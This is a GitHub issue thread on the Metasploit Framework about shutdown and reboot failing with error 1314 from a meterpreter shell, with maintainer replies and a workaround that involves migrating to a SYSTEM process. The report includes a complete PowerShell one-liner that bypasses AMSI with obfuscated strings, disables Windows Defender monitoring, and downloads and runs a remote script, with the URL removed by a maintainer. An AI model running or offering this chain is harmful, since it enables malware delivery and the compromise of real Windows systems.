search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.01k stars 13.94k forks source link

stdapi_sys_power_exitwindows: Operation failed: 1314 #14675

Closed GetRektBoy724 closed 3 years ago

GetRektBoy724 commented 3 years ago

Steps to reproduce

How'd you do it?

  1. open victim's cmd as admin
  2. enter this one-liner powershell.exe -nop -ep bypass -NoExit -Command "[Ref].Assembly.GetType('System.Management.Automation.'+$([cHAr]([ByTE]0x41)+[cHAr]([byte]0x6D)+[ChAR](115)+[char]([bYtE]0x69))+'Utils').GetField($([systeM.NET.WEbUtIliTY]::HtMldECoDe('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);;Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableScriptScanning $true;;IEX(New-Object Net.WebClient).DownloadString('https://[redacted]');"
  3. get a meterpreter shell
  4. type getsystem -t 2 on the meterpreter shell

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions. windows 10 v20H2

Were you following a specific guide/tutorial or reading documentation?

nope

Expected behavior

What should happen? i can shutdown and reboot the victim's system

Current behavior

i get stdapi_sys_power_exitwindows: Operation failed: 1314 for shutdown and reboot command

Metasploit version

metasploit v6.0.26-dev

smcintyre-r7 commented 3 years ago

Please don't link to live payloads, I updated your post to remove the URL.

Looks like error 1314 is ERROR_PRIVILEGE_NOT_HELD. Did getsystem succeed? I'm guessing that it failed and that you lack the privileges necessary to perform the operation.

GetRektBoy724 commented 3 years ago

yea,the getsystem succeds.even with normal user,reboot and shutdown works normally

GetRektBoy724 commented 3 years ago

anyone can help me? :')

GetRektBoy724 commented 3 years ago

meh found a wayaround,after getting a administrator meterpreter shell,use getsystem,after that migrate to other windows process that have NT AUTHORITY/SYSTEM too,and after that reboot and shutdown working normally

Nnutural commented 1 month ago

Screenshot 2024-08-27 233947 A useful solution

smcintyre-r7 commented 1 month ago

If you're running as SYSTEM, the getprivs command might be able to get the necessary privileges to shutdown/reboot.